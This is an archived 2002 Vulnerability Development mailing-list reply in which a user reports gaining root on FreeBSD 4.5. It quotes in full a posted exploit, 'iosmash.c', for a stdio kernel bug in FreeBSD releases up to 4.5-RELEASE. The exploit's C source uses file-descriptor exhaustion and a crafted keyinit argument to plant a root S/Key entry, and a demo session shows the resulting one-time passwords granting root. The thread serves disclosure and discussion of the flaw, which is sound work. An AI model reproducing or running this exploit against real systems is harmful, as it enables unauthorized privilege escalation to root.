Vulnerability Development mailing list archives
Re: cheers
From: "Onie Camara" <neil () restricted dyndns org>
Date: Tue, 23 Apr 2002 08:57:30 -0500
Even on my FreeBSD 4.5 STABLE, I got root access. This is terrifying. :-) So any solutions? ----- Original Message ----- From: "KF" <dotslash () snosoft com> To: "bugtraq" <bugtraq () securityfocus org>; "vuln-dev" <vuln-dev () security-focus com> Sent: Tuesday, April 23, 2002 1:24 AM Subject: cheers
http://www.phased.home.ro/iosmash.c -KF
---------------------------------------------------------------------------- ----
/* phased/b10z phased () snosoft com 23/04/2002 stdio kernel bug in All releases of FreeBSD up to and including
4.5-RELEASE
decided to make a trivial exploit to easily get root :) > id uid=1003(phased) gid=999(phased) groups=999(phased) > ./iosmash Adding phased: <--- HIT CTRL-C ---> > su s/key 98 snosoft2 Password:MASS OAT ROLL TOOL AGO CAM xes# this program makes the following skeys valid 95: CARE LIVE CARD LOFT CHIC HILL 96: TESS OIL WELD DUD MUTE KIT 97: DADE BED DRY JAW GRAB NOV 98: MASS OAT ROLL TOOL AGO CAM 99: DARK LEW JOLT JIVE MOS WHO http://www.snosoft.com cheers Joost Pol */ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { while(dup(1) != -1); close(2); execl("/usr/bin/keyinit", "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n"); }
Current thread:
- cheers KF (Apr 22)
- Re: cheers Foldi Tamas (Apr 24)
- Re: cheers Onie Camara (Apr 24)
- Re: cheers Onie Camara (Apr 24)
- Re: cheers KF (Apr 24)
- Re: cheers Onie Camara (Apr 24)
- Re: cheers KF (Apr 24)
- Re: cheers KF (Apr 24)
- Re: cheers Edsel Adap (Apr 24)
- <Possible follow-ups>
- Re: cheers zeno (Apr 24)
- Re: cheers Onie Camara (Apr 25)
- RE: cheers Knud Erik Hojgaard (Apr 25)